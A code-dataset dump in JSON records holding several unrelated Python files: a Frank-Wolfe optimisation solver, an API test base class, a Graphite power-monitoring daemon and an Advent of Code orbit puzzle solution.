0, memory_mode, bias_value=bias_value))\n\n # Compute X^TX\n print('Computing xtx...')\n x_t_x = np.zeros([d, d])\n N = 0\n for i in tqdm(range(len(feats))):\n x = get_feat_block(feats, i, memory_mode, bias_value=bias_value)\n x_t_x += np.dot(np.transpose(x), x)\n N += x.shape[0]\n\n # Compute P\n p_matrix = []\n print('Inverting big matrix...')\n inv_mat = np.linalg.inv(x_t_x + N * alpha * np.eye(d))\n print('Computing P matrix by block...')\n for i in tqdm(range(len(feats))):\n x = get_feat_block(feats, i, memory_mode, bias_value=bias_value)\n sol = np.dot(inv_mat, np.transpose(x))\n if memory_mode == 'RAM':\n p_matrix.append(np.array(sol))\n else:\n path_x = feats[i]\n base_path, filename = os.path.split(path_x)\n np.save(os.path.join(base_path, 'P_{}'.format(filename)), sol)\n p_matrix.append(path_x)\n\n return p_matrix, N\n\n\ndef compute_weights(p_matrix, asgn, memory_mode):\n d, _ = np.shape(get_p_block(p_matrix, 0, memory_mode))\n _, k = np.shape(asgn[0])\n\n weights = np.zeros([d, k])\n\n print('Computing weights from scratch...')\n for i in tqdm(range(len(p_matrix))):\n weights += np.dot(get_p_block(p_matrix, i, memory_mode), asgn[i])\n\n return weights\n\n\ndef compute_obj(x, y, weights, n_feats):\n return 1.0 / n_feats * matrix_norm(np.dot(x, weights) - y, ord='fro')**2\n\n\ndef compute_grad(x, y, weights, n_feats):\n return 1.0 / n_feats * (y - np.dot(x, weights))\n\n\ndef compute_gap(x,\n y,\n weights,\n n_feats,\n cstr,\n cstr_solver,\n opt_y=None,\n grad_y=None):\n\n # Check if we need to call the oracle.\n if opt_y is None:\n grad_y = compute_grad(x, y, weights, n_feats)\n opt_y = cstr_solver.solve(cstr, grad_y)\n\n gap = -np.multiply(opt_y - y, grad_y).sum()\n\n return gap\n\n\ndef sample_block(gaps, block_sampling):\n if block_sampling == 'uniform':\n return np.random.randint(0, len(gaps), 1)[0]\n elif block_sampling == 'gap_sampling':\n if not np.all(gaps >= 0):\n print('Warning: some gaps are negative block {}, value :{}'.format(\n gaps.argmin(), gaps.min()))\n gaps[gaps < 0] = 0.00000001\n\n gap_prob = gaps / gaps.sum()\n return np.random.choice(len(gaps), 1, p=gap_prob)[0]\n\n\ndef display_information(iter,\n max_iter,\n gaps,\n eval_metric,\n objective_value=None,\n verbose='silent',\n prev_time=-1,\n prev_global_time=-1):\n \"\"\"Display information about the training.\"\"\"\n if objective_value is None:\n objective_value = []\n\n if verbose in ['normal', 'heavy']:\n string_display = 'Iteration {0:05d}/{1:05d}, Gap sum: 
{2:.4E}'.format(\n iter, max_iter, gaps.sum())\n\n new_time = time.time()\n if prev_time > 0:\n diff_time = int(round(new_time - prev_time))\n string_display += ' ({:d} s)'.format(diff_time)\n if prev_global_time > 0:\n diff_time = int(round(new_time - prev_global_time))\n string_display += ' (Glob. {:d} s)'.format(diff_time)\n\n if eval_metric >= 0:\n string_display += ', Eval metric: {:.2f}'.format(eval_metric)\n\n if objective_value:\n string_display += ', Objective: '\n string_display += ','.join([\n '{}: {:.4E}'.format(key, value)\n for key, value in objective_value.items()\n ])\n\n print(string_display)\n\n\ndef save_asgn_block(path_save_asgn, block_idx, asgn, t):\n np.save(\n os.path.join(path_save_asgn, '{0}_{1:05d}.npy'.format(block_idx, t)),\n asgn[block_idx])\n\n\ndef save_xw_block(path_save_asgn, block_idx, x, weights, t):\n np.save(\n os.path.join(path_save_asgn, 'xw_{0}_{1:05d}.npy'.format(block_idx,\n t)),\n np.dot(x, weights))\n\n\ndef save_gt_block(path_save_asgn, block_idx, gts):\n np.save(\n os.path.join(path_save_asgn, '{}_gt.npy'.format(block_idx)),\n gts[block_idx])\n\n\ndef solver(feats,\n asgn,\n cstrs,\n cstrs_solver,\n gts=None,\n eval_function=None,\n rounding_function=None,\n alpha=1e-4,\n memory_mode='RAM',\n bias_value=-1.0,\n n_iterations=10000,\n block_sampling='uniform',\n verbose='silent',\n gap_frequency=2000,\n eval_frequency=500,\n verbose_frequency=250,\n objective_frequency=250,\n path_save_asgn=None,\n validation_info=None):\n \"\"\"Main solver for DiffracBCFW.\n\n Args:\n feats: Input features as a list (one entry per block).\n asgn: Assignment variables as a list (one entry per block). This provides\n the initialization of the system.\n cstrs: Input constraints as a dictionary (one entry per block).\n cstrs_solver: Method that takes as input a gradient for a block and a cstrs and then\n returns the LP solution.\n gts: A ground truth can be specified if you wish to evaluate your solution.\n eval_function: an eval function method can be provided.\n rounding_function: rounding function.\n alpha: Value of the regularization parameter (lambda in the paper).\n memory_mode: `disk` (features are stored in disk) or `RAM` (features are in RAM).\n bias_value: Value to add for the bias (if negative no bias is added to the features).\n n_iterations: Number of iterations of the solver.\n block_sampling: Method for sampling block.\n verbose: `silent`, `normal`, `heavy`.\n gap_frequency: frequency to recompute all the gaps.\n eval_frequency: frequency to perform evaluation.\n verbose_frequency: frequency to print info.\n objective_frequency: frequency to compute objective (only used if positive).\n path_save_asgn: If not None save asgn at path_save_asgn. 
None by default.\n validation_info: If not None perform evaluation on validation\n \"\"\"\n\n compute_objective = False\n objective_value = None\n if objective_frequency > 0:\n compute_objective = True\n\n save_asgn = False\n save_ids = []\n if path_save_asgn is not None:\n if not os.path.exists(path_save_asgn):\n os.makedirs(path_save_asgn)\n # Monitor evolution of asgn during optim on a subset of samples.\n save_asgn = True\n n_save_asgn = min(20, len(asgn))\n save_ids = np.random.choice(len(asgn), n_save_asgn, replace=False)\n\n # Pre-compute the P matrix.\n p_matrix, n_feats = compute_p_matrix(\n feats, alpha, memory_mode, bias_value=bias_value)\n\n # Compute W.\n weights = compute_weights(p_matrix, asgn, memory_mode=memory_mode)\n\n # Init the gaps.\n gaps = np.zeros(len(feats))\n print('Computing init gaps...')\n for block_idx in tqdm(range(len(feats))):\n x = get_feat_block(\n feats, block_idx, memory_mode, bias_value=bias_value)\n gaps[block_idx] = compute_gap(x, asgn[block_idx], weights, n_feats,\n cstrs[block_idx], cstrs_solver)\n\n if save_asgn and block_idx in save_ids:\n save_asgn_block(path_save_asgn, block_idx, asgn, 0)\n save_xw_block(path_save_asgn, block_idx, x, weights, 0)\n save_gt_block(path_save_asgn, block_idx, gts)\n\n print('Init gap: {0:4E}, starting the optimization...'.format(gaps.sum()))\n\n eval_metric = -1.0\n prev_time = time.time() # init time of iterations\n prev_global_time = prev_time\n for t in range(n_iterations):\n if eval_frequency > 0 and t % eval_frequency == 0:\n # Evaluation.\n if eval_function is not None and gts is not None:\n print('Performing evaluation...')\n eval_metric = eval_function.evaluate(asgn, gts, weights, feats,\n rounding_function, cstrs)\n if validation_info is not None:\n gts_val = validation_info['gts']\n feats_val = validation_info['feats']\n eval_function.evaluate(None, gts_val, weights, feats_val,\n rounding_function, None)\n else:\n eval_metric = -1.0\n\n if compute_objective and t % objective_frequency == 0:\n print('Computing objective...')\n objective_value = {}\n # Compute the diffrac objective.\n dfrac_obj = 0.0\n # Data dependent term: 1.0 / N * ||X * W - Y||_2^2\n for block_idx in range(len(feats)):\n x = get_feat_block(\n feats, block_idx, memory_mode, bias_value=bias_value)\n dfrac_obj += compute_obj(x, asgn[block_idx], weights, n_feats)\n\n # Regularization term: \\alpha * || W ||_2^2\n dfrac_obj += alpha * matrix_norm(weights, ord='fro')**2\n objective_value['dfrac'] = dfrac_obj\n\n # Print information.\n if t % verbose_frequency == 0:\n display_information(t, n_iterations, gaps, eval_metric,\n objective_value, verbose, prev_time, prev_global_time)\n prev_time = time.time()\n\n # Sample a block.\n block_idx = sample_block(gaps, block_sampling)\n # Compute gradient.\n x = get_feat_block(\n feats, block_idx, memory_mode, bias_value=bias_value)\n y = asgn[block_idx]\n\n grad_y = compute_grad(x, y, weights, n_feats)\n\n opt_y = cstrs_solver.solve(cstrs[block_idx], grad_y)\n gaps[block_idx] = compute_gap(x, y, weights, n_feats,\n cstrs[block_idx], cstrs_solver,\n opt_y, grad_y)\n\n # Step size computation.\n p = get_p_block(p_matrix, block_idx, memory_mode)\n dir_y = opt_y - y\n gamma_n = gaps[block_idx]\n\n gamma_d = 1.0 / n_feats * np.multiply(\n dir_y, dir_y - np.linalg.multi_dot([x, p, dir_y])).sum()\n\n gamma = min(1.0, gamma_n / gamma_d)\n # gamma should always be positive.\n if gamma < 0:\n print 'Warning: gamma = {}, gap_i = {}'.format(\n gamma, gaps[block_idx])\n gamma = 0.0\n\n # Update variables.\n 
asgn[block_idx] += gamma * dir_y\n weights += gamma * np.dot(p, dir_y)\n\n if save_asgn and block_idx in save_ids:\n save_asgn_block(path_save_asgn, block_idx, asgn, t)\n save_xw_block(path_save_asgn, block_idx, x, weights, t)\n\n # Update gaps if needed.\n if (t + 1) % gap_frequency == 0:\n print('Recomputing gaps...')\n for block_idx in tqdm(range(len(feats))):\n x = get_feat_block(\n feats, block_idx, memory_mode, bias_value=bias_value)\n gaps[block_idx] = compute_gap(x, asgn[block_idx], weights,\n n_feats, cstrs[block_idx],\n cstrs_solver)\n display_information(t, n_iterations, gaps, eval_metric,\n objective_value, verbose)\n\n return asgn, weights\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
"Base class for tests."
import argparse
import http.client
import json
import os
import re
import sys
import unittest
import jsonschema
import requests
SCHEMA_LINK_RX = re.compile(r'<([^>])+>; rel="([^"]+)')
JSON_MIMETYPE = 'application/json'
DEFAULT_SETTINGS = {
'ROOT_URL': 'http://127.0.0.1:5002/api',
'USERNAME': None, # Needs to be set! Must have admin privileges.
'APIKEY': None # Needs to be set! For the above user.
}
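# Example settings.json (the values below are placeholders):
# {
#     "ROOT_URL": "http://127.0.0.1:5002/api",
#     "USERNAME": "admin",
#     "APIKEY": "0123456789abcdef"
# }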
# The actual settings to use.
SETTINGS = {}
def process_args(filepath=None):
"""Process command-line arguments for this test suite.
Reset the settings and read the given settings file.
Return the unused arguments.
"""
if filepath is None:
parser = argparse.ArgumentParser()
parser.add_argument('-S', '--settings', dest='settings',
metavar='FILE', default='settings.json',
help='Settings file')
parser.add_argument('unittest_args', nargs='*')
options, args = parser.parse_known_args()
filepath = options.settings
args = [sys.argv[0]] + args
else:
args = sys.argv
SETTINGS.update(DEFAULT_SETTINGS)
with open(filepath) as infile:
SETTINGS.update(json.load(infile))
assert SETTINGS['USERNAME']
assert SETTINGS['APIKEY']
return args
def run():
unittest.main(argv=process_args())
class Base(unittest.TestCase):
"Base class for Symbasis test cases."
def setUp(self):
self.schemas = {}
self.session = requests.Session()
self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})
self.addCleanup(self.close_session)
def close_session(self):
self.session.close()
@property
def root(self):
"Return the API root data."
try:
return self._root
except AttributeError:
response = self.GET(SETTINGS['ROOT_URL'])
self.assertEqual(response.status_code, http.client.OK)
self._root = self.check_schema(response)
return self._root
def GET(self, url):
return self.session.get(url)
def POST(self, url, json=None):
return self.session.post(url, json=json)
def PUT(self, url):
return self.session.put(url)
def DELETE(self, url):
return self.session.delete(url)
def check_schema(self, response):
"""Check that the response JSON data matches the schema
linked to in the response header.
Return the response JSON.
"""
self.assertEqual(response.status_code, http.client.OK)
result = response.json()
url = response.links['schema']['url']
try:
schema = self.schemas[url]
except KeyError:
r = self.GET(url)
self.assertEqual(r.status_code, http.client.OK)
schema = r.json()
self.schemas[url] = schema
self.validate_schema(result, schema)
return result
def validate_schema(self, instance, schema):
"Validate the JSON instance versus the given JSON schema."
jsonschema.validate(instance=instance,
schema=schema,
format_checker=jsonschema.draft7_format_checker)
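# Minimal usage sketch (hypothetical subclass; the assertion is illustrative):
#   class TestRoot(Base):
#       def test_root(self):
#           "The API root is reachable and validates against its schema."
#           data = self.root  # GETs ROOT_URL and runs check_schema()
#           self.assertTrue(data)
#   if __name__ == '__main__':
#       run()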
|
normal
|
{
"blob_id": "c455de70a79f70f5f0e21391511f5035f1b4feb9",
"index": 646,
"step-1": "<mask token>\n\n\nclass Base(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n self.schemas = {}\n self.session = requests.Session()\n self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})\n self.addCleanup(self.close_session)\n\n def close_session(self):\n self.session.close()\n\n @property\n def root(self):\n \"\"\"Return the API root data.\"\"\"\n try:\n return self._root\n except AttributeError:\n response = self.GET(SETTINGS['ROOT_URL'])\n self.assertEqual(response.status_code, http.client.OK)\n self._root = self.check_schema(response)\n return self._root\n\n def GET(self, url):\n return self.session.get(url)\n <mask token>\n <mask token>\n\n def DELETE(self, url):\n return self.session.delete(url)\n\n def check_schema(self, response):\n \"\"\"Check that the response JSON data matches the schema\n linked to in the response header.\n Return the response JSON.\n \"\"\"\n self.assertEqual(response.status_code, http.client.OK)\n result = response.json()\n url = response.links['schema']['url']\n try:\n schema = self.schemas[url]\n except KeyError:\n r = self.GET(url)\n self.assertEqual(r.status_code, http.client.OK)\n schema = r.json()\n self.schemas[url] = schema\n self.validate_schema(result, schema)\n return result\n\n def validate_schema(self, instance, schema):\n \"\"\"Validate the JSON instance versus the given JSON schema.\"\"\"\n jsonschema.validate(instance=instance, schema=schema,\n format_checker=jsonschema.draft7_format_checker)\n",
"step-2": "<mask token>\n\n\ndef process_args(filepath=None):\n \"\"\"Process command-line arguments for this test suite.\n Reset the settings and read the given settings file.\n Return the unused arguments.\n \"\"\"\n if filepath is None:\n parser = argparse.ArgumentParser()\n parser.add_argument('-S', '--settings', dest='settings', metavar=\n 'FILE', default='settings.json', help='Settings file')\n parser.add_argument('unittest_args', nargs='*')\n options, args = parser.parse_known_args()\n filepath = options.settings\n args = [sys.argv[0]] + args\n else:\n args = sys.argv\n SETTINGS.update(DEFAULT_SETTINGS)\n with open(filepath) as infile:\n SETTINGS.update(json.load(infile))\n assert SETTINGS['USERNAME']\n assert SETTINGS['APIKEY']\n return args\n\n\n<mask token>\n\n\nclass Base(unittest.TestCase):\n \"\"\"Base class for Symbasis test cases.\"\"\"\n\n def setUp(self):\n self.schemas = {}\n self.session = requests.Session()\n self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})\n self.addCleanup(self.close_session)\n\n def close_session(self):\n self.session.close()\n\n @property\n def root(self):\n \"\"\"Return the API root data.\"\"\"\n try:\n return self._root\n except AttributeError:\n response = self.GET(SETTINGS['ROOT_URL'])\n self.assertEqual(response.status_code, http.client.OK)\n self._root = self.check_schema(response)\n return self._root\n\n def GET(self, url):\n return self.session.get(url)\n\n def POST(self, url, json=None):\n return self.session.post(url, json=json)\n\n def PUT(self, url):\n return self.session.put(url)\n\n def DELETE(self, url):\n return self.session.delete(url)\n\n def check_schema(self, response):\n \"\"\"Check that the response JSON data matches the schema\n linked to in the response header.\n Return the response JSON.\n \"\"\"\n self.assertEqual(response.status_code, http.client.OK)\n result = response.json()\n url = response.links['schema']['url']\n try:\n schema = self.schemas[url]\n except KeyError:\n r = self.GET(url)\n self.assertEqual(r.status_code, http.client.OK)\n schema = r.json()\n self.schemas[url] = schema\n self.validate_schema(result, schema)\n return result\n\n def validate_schema(self, instance, schema):\n \"\"\"Validate the JSON instance versus the given JSON schema.\"\"\"\n jsonschema.validate(instance=instance, schema=schema,\n format_checker=jsonschema.draft7_format_checker)\n",
"step-3": "<mask token>\n\n\ndef process_args(filepath=None):\n \"\"\"Process command-line arguments for this test suite.\n Reset the settings and read the given settings file.\n Return the unused arguments.\n \"\"\"\n if filepath is None:\n parser = argparse.ArgumentParser()\n parser.add_argument('-S', '--settings', dest='settings', metavar=\n 'FILE', default='settings.json', help='Settings file')\n parser.add_argument('unittest_args', nargs='*')\n options, args = parser.parse_known_args()\n filepath = options.settings\n args = [sys.argv[0]] + args\n else:\n args = sys.argv\n SETTINGS.update(DEFAULT_SETTINGS)\n with open(filepath) as infile:\n SETTINGS.update(json.load(infile))\n assert SETTINGS['USERNAME']\n assert SETTINGS['APIKEY']\n return args\n\n\ndef run():\n unittest.main(argv=process_args())\n\n\nclass Base(unittest.TestCase):\n \"\"\"Base class for Symbasis test cases.\"\"\"\n\n def setUp(self):\n self.schemas = {}\n self.session = requests.Session()\n self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})\n self.addCleanup(self.close_session)\n\n def close_session(self):\n self.session.close()\n\n @property\n def root(self):\n \"\"\"Return the API root data.\"\"\"\n try:\n return self._root\n except AttributeError:\n response = self.GET(SETTINGS['ROOT_URL'])\n self.assertEqual(response.status_code, http.client.OK)\n self._root = self.check_schema(response)\n return self._root\n\n def GET(self, url):\n return self.session.get(url)\n\n def POST(self, url, json=None):\n return self.session.post(url, json=json)\n\n def PUT(self, url):\n return self.session.put(url)\n\n def DELETE(self, url):\n return self.session.delete(url)\n\n def check_schema(self, response):\n \"\"\"Check that the response JSON data matches the schema\n linked to in the response header.\n Return the response JSON.\n \"\"\"\n self.assertEqual(response.status_code, http.client.OK)\n result = response.json()\n url = response.links['schema']['url']\n try:\n schema = self.schemas[url]\n except KeyError:\n r = self.GET(url)\n self.assertEqual(r.status_code, http.client.OK)\n schema = r.json()\n self.schemas[url] = schema\n self.validate_schema(result, schema)\n return result\n\n def validate_schema(self, instance, schema):\n \"\"\"Validate the JSON instance versus the given JSON schema.\"\"\"\n jsonschema.validate(instance=instance, schema=schema,\n format_checker=jsonschema.draft7_format_checker)\n",
"step-4": "<mask token>\nSCHEMA_LINK_RX = re.compile('<([^>])+>; rel=\"([^\"]+)')\nJSON_MIMETYPE = 'application/json'\nDEFAULT_SETTINGS = {'ROOT_URL': 'http://127.0.0.1:5002/api', 'USERNAME':\n None, 'APIKEY': None}\nSETTINGS = {}\n\n\ndef process_args(filepath=None):\n \"\"\"Process command-line arguments for this test suite.\n Reset the settings and read the given settings file.\n Return the unused arguments.\n \"\"\"\n if filepath is None:\n parser = argparse.ArgumentParser()\n parser.add_argument('-S', '--settings', dest='settings', metavar=\n 'FILE', default='settings.json', help='Settings file')\n parser.add_argument('unittest_args', nargs='*')\n options, args = parser.parse_known_args()\n filepath = options.settings\n args = [sys.argv[0]] + args\n else:\n args = sys.argv\n SETTINGS.update(DEFAULT_SETTINGS)\n with open(filepath) as infile:\n SETTINGS.update(json.load(infile))\n assert SETTINGS['USERNAME']\n assert SETTINGS['APIKEY']\n return args\n\n\ndef run():\n unittest.main(argv=process_args())\n\n\nclass Base(unittest.TestCase):\n \"\"\"Base class for Symbasis test cases.\"\"\"\n\n def setUp(self):\n self.schemas = {}\n self.session = requests.Session()\n self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})\n self.addCleanup(self.close_session)\n\n def close_session(self):\n self.session.close()\n\n @property\n def root(self):\n \"\"\"Return the API root data.\"\"\"\n try:\n return self._root\n except AttributeError:\n response = self.GET(SETTINGS['ROOT_URL'])\n self.assertEqual(response.status_code, http.client.OK)\n self._root = self.check_schema(response)\n return self._root\n\n def GET(self, url):\n return self.session.get(url)\n\n def POST(self, url, json=None):\n return self.session.post(url, json=json)\n\n def PUT(self, url):\n return self.session.put(url)\n\n def DELETE(self, url):\n return self.session.delete(url)\n\n def check_schema(self, response):\n \"\"\"Check that the response JSON data matches the schema\n linked to in the response header.\n Return the response JSON.\n \"\"\"\n self.assertEqual(response.status_code, http.client.OK)\n result = response.json()\n url = response.links['schema']['url']\n try:\n schema = self.schemas[url]\n except KeyError:\n r = self.GET(url)\n self.assertEqual(r.status_code, http.client.OK)\n schema = r.json()\n self.schemas[url] = schema\n self.validate_schema(result, schema)\n return result\n\n def validate_schema(self, instance, schema):\n \"\"\"Validate the JSON instance versus the given JSON schema.\"\"\"\n jsonschema.validate(instance=instance, schema=schema,\n format_checker=jsonschema.draft7_format_checker)\n",
"step-5": "\"Base class for tests.\"\n\nimport argparse\nimport http.client\nimport json\nimport os\nimport re\nimport sys\nimport unittest\n\nimport jsonschema\nimport requests\n\nSCHEMA_LINK_RX = re.compile(r'<([^>])+>; rel=\"([^\"]+)')\n\nJSON_MIMETYPE = 'application/json'\n\nDEFAULT_SETTINGS = {\n 'ROOT_URL': 'http://127.0.0.1:5002/api',\n 'USERNAME': None, # Needs to be set! Must have admin privileges.\n 'APIKEY': None # Needs to be set! For the above user.\n}\n\n# The actual settings to use.\nSETTINGS = {}\n\ndef process_args(filepath=None):\n \"\"\"Process command-line arguments for this test suite.\n Reset the settings and read the given settings file.\n Return the unused arguments.\n \"\"\"\n if filepath is None:\n parser = argparse.ArgumentParser()\n parser.add_argument('-S', '--settings', dest='settings',\n metavar='FILE', default='settings.json',\n help='Settings file')\n parser.add_argument('unittest_args', nargs='*')\n options, args = parser.parse_known_args()\n filepath = options.settings\n args = [sys.argv[0]] + args\n else:\n args = sys.argv\n SETTINGS.update(DEFAULT_SETTINGS)\n with open(filepath) as infile:\n SETTINGS.update(json.load(infile))\n assert SETTINGS['USERNAME']\n assert SETTINGS['APIKEY']\n return args\n\ndef run():\n unittest.main(argv=process_args())\n\n\nclass Base(unittest.TestCase):\n \"Base class for Symbasis test cases.\"\n\n def setUp(self):\n self.schemas = {}\n self.session = requests.Session()\n self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})\n self.addCleanup(self.close_session)\n\n def close_session(self):\n self.session.close()\n\n @property\n def root(self):\n \"Return the API root data.\"\n try:\n return self._root\n except AttributeError:\n response = self.GET(SETTINGS['ROOT_URL'])\n self.assertEqual(response.status_code, http.client.OK)\n self._root = self.check_schema(response)\n return self._root\n\n def GET(self, url):\n return self.session.get(url)\n\n def POST(self, url, json=None):\n return self.session.post(url, json=json)\n\n def PUT(self, url):\n return self.session.put(url)\n\n def DELETE(self, url):\n return self.session.delete(url)\n\n def check_schema(self, response):\n \"\"\"Check that the response JSON data matches the schema\n linked to in the response header.\n Return the response JSON.\n \"\"\"\n self.assertEqual(response.status_code, http.client.OK)\n result = response.json()\n url = response.links['schema']['url']\n try:\n schema = self.schemas[url]\n except KeyError:\n r = self.GET(url)\n self.assertEqual(r.status_code, http.client.OK)\n schema = r.json()\n self.schemas[url] = schema\n self.validate_schema(result, schema)\n return result\n\n def validate_schema(self, instance, schema):\n \"Validate the JSON instance versus the given JSON schema.\"\n jsonschema.validate(instance=instance,\n schema=schema,\n format_checker=jsonschema.draft7_format_checker)\n",
"step-ids": [
8,
12,
13,
14,
16
]
}
|
[
8,
12,
13,
14,
16
] |
#!/usr/bin/python
import time
from daemon import runner
import graphitesend
from pywatts import get_data
class App():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/currentcost_daemon.pid'
self.pidfile_timeout = 5
def run(self):
while True:
graphitesend.init(graphite_server='localhost', system_name='', group='power', prefix='house')
try:
watts, temperature = get_data()
graphitesend.send_dict({'temperature':temperature, 'usage':watts})
time.sleep(5)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
time.sleep(5)
app = App()
daemon_runner = runner.DaemonRunner(app)
daemon_runner.do_action()
|
normal
|
{
"blob_id": "1aa49bc9a3ea12dffff907d17bd40b4425f28e13",
"index": 9829,
"step-1": "#!/usr/bin/python\nimport time\nfrom daemon import runner\nimport graphitesend\nfrom pywatts import get_data\n\nclass App():\n\tdef __init__(self):\n\t\tself.stdin_path = '/dev/null'\n\t\tself.stdout_path = '/dev/tty'\n\t\tself.stderr_path = '/dev/tty'\n\t\tself.pidfile_path = '/tmp/currentcost_daemon.pid'\n\t\tself.pidfile_timeout = 5\n\n\n def run(self):\n while True:\n graphitesend.init(graphite_server='localhost', system_name='', group='power', prefix='house') \n try:\n watts, temperature = get_data()\n graphitesend.send_dict({'temperature':temperature, 'usage':watts})\n time.sleep(5)\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n pass\n \n time.sleep(5)\n \n \napp = App()\ndaemon_runner = runner.DaemonRunner(app)\ndaemon_runner.do_action()\n \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import sys
import json
with open(__file__.replace('.py', '.txt')) as f:
problem = f.read()
data = {
'problem': problem,
'example': """COM)B
B)C
C)D
D)E
E)F
B)G
G)H
D)I
E)J
J)K
K)L""" # should give 42
}
def solve_problem(input):
parents = {}
for i, line in enumerate(input.split('\n')):
about, object = line.split(')')
parents[object] = about
orbit_counts = {'COM': 0}
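    # Walk up the parent chain until a node with a known count is found, then
    # fill in counts on the way back down (memoised depth from COM).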
for object in tuple(parents.keys()):
stack = [object]
while stack[-1] not in orbit_counts:
stack.append(parents[stack[-1]])
known = orbit_counts[stack.pop()]
stack.reverse()
for thing in stack:
orbit_counts[thing] = orbit_counts[parents[thing]] + 1
return sum(orbit_counts.values())
# part 1
if sys.argv[-1] in data.keys():
scenarios = (sys.argv[-1],)
else:
scenarios = tuple(data.keys())
for scenario in scenarios:
input = data[scenario]
r = solve_problem(input)
print(f'FINAL ANSWER: {r}')
# 932, too low
print('')
print('**** PART 2 ******')
def get_parents(key, parents):
"""Get parents for a particular key through parents dict"""
r = [key]
while True:
this_one = r[-1]
if this_one == 'COM':
return r
r.append(parents[this_one])
def part2(input):
parents = {}
for i, line in enumerate(input.split('\n')):
about, object = line.split(')')
parents[object] = about
santa = get_parents('SAN', parents)
me = get_parents('YOU', parents)
for i, planet in enumerate(me):
if planet in santa:
print(f'met at {planet}')
print('')
print(santa[:santa.index(planet) + 1])
print(len(santa[:santa.index(planet) + 1]))
# minus one because we want traversials between elements in list
print(santa.index(planet))
print('')
print(me[:i + 1])
print(len(me[:i + 1]))
# minus one because we want traversials between elements in list
print(i)
# minus another one because transfering to the planet is already counted
# ...or something like that
# minus one because problem said so
return i + santa.index(planet) - 1
data['example'] = """COM)B
B)C
C)D
D)E
E)F
B)G
G)H
D)I
E)J
J)K
K)L
K)YOU
I)SAN"""
for scenario in scenarios:
input = data[scenario]
r = part2(input)
print(f'Part 2 answer {r}')
# 432, too high
# 433, too high
# 431, too high
# 430, correct
|
normal
|
{
"blob_id": "e57680c9bd09866e68ade0cfea7ce83cd6d50f58",
"index": 1596,
"step-1": "<mask token>\n\n\ndef solve_problem(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n orbit_counts = {'COM': 0}\n for object in tuple(parents.keys()):\n stack = [object]\n while stack[-1] not in orbit_counts:\n stack.append(parents[stack[-1]])\n known = orbit_counts[stack.pop()]\n stack.reverse()\n for thing in stack:\n orbit_counts[thing] = orbit_counts[parents[thing]] + 1\n return sum(orbit_counts.values())\n\n\n<mask token>\n\n\ndef get_parents(key, parents):\n \"\"\"Get parents for a particular key through parents dict\"\"\"\n r = [key]\n while True:\n this_one = r[-1]\n if this_one == 'COM':\n return r\n r.append(parents[this_one])\n\n\ndef part2(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n santa = get_parents('SAN', parents)\n me = get_parents('YOU', parents)\n for i, planet in enumerate(me):\n if planet in santa:\n print(f'met at {planet}')\n print('')\n print(santa[:santa.index(planet) + 1])\n print(len(santa[:santa.index(planet) + 1]))\n print(santa.index(planet))\n print('')\n print(me[:i + 1])\n print(len(me[:i + 1]))\n print(i)\n return i + santa.index(planet) - 1\n\n\n<mask token>\n",
"step-2": "<mask token>\nwith open(__file__.replace('.py', '.txt')) as f:\n problem = f.read()\n<mask token>\n\n\ndef solve_problem(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n orbit_counts = {'COM': 0}\n for object in tuple(parents.keys()):\n stack = [object]\n while stack[-1] not in orbit_counts:\n stack.append(parents[stack[-1]])\n known = orbit_counts[stack.pop()]\n stack.reverse()\n for thing in stack:\n orbit_counts[thing] = orbit_counts[parents[thing]] + 1\n return sum(orbit_counts.values())\n\n\nif sys.argv[-1] in data.keys():\n scenarios = sys.argv[-1],\nelse:\n scenarios = tuple(data.keys())\nfor scenario in scenarios:\n input = data[scenario]\n r = solve_problem(input)\n print(f'FINAL ANSWER: {r}')\nprint('')\nprint('**** PART 2 ******')\n\n\ndef get_parents(key, parents):\n \"\"\"Get parents for a particular key through parents dict\"\"\"\n r = [key]\n while True:\n this_one = r[-1]\n if this_one == 'COM':\n return r\n r.append(parents[this_one])\n\n\ndef part2(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n santa = get_parents('SAN', parents)\n me = get_parents('YOU', parents)\n for i, planet in enumerate(me):\n if planet in santa:\n print(f'met at {planet}')\n print('')\n print(santa[:santa.index(planet) + 1])\n print(len(santa[:santa.index(planet) + 1]))\n print(santa.index(planet))\n print('')\n print(me[:i + 1])\n print(len(me[:i + 1]))\n print(i)\n return i + santa.index(planet) - 1\n\n\n<mask token>\nfor scenario in scenarios:\n input = data[scenario]\n r = part2(input)\n print(f'Part 2 answer {r}')\n",
"step-3": "<mask token>\nwith open(__file__.replace('.py', '.txt')) as f:\n problem = f.read()\ndata = {'problem': problem, 'example':\n \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\"\"\"}\n\n\ndef solve_problem(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n orbit_counts = {'COM': 0}\n for object in tuple(parents.keys()):\n stack = [object]\n while stack[-1] not in orbit_counts:\n stack.append(parents[stack[-1]])\n known = orbit_counts[stack.pop()]\n stack.reverse()\n for thing in stack:\n orbit_counts[thing] = orbit_counts[parents[thing]] + 1\n return sum(orbit_counts.values())\n\n\nif sys.argv[-1] in data.keys():\n scenarios = sys.argv[-1],\nelse:\n scenarios = tuple(data.keys())\nfor scenario in scenarios:\n input = data[scenario]\n r = solve_problem(input)\n print(f'FINAL ANSWER: {r}')\nprint('')\nprint('**** PART 2 ******')\n\n\ndef get_parents(key, parents):\n \"\"\"Get parents for a particular key through parents 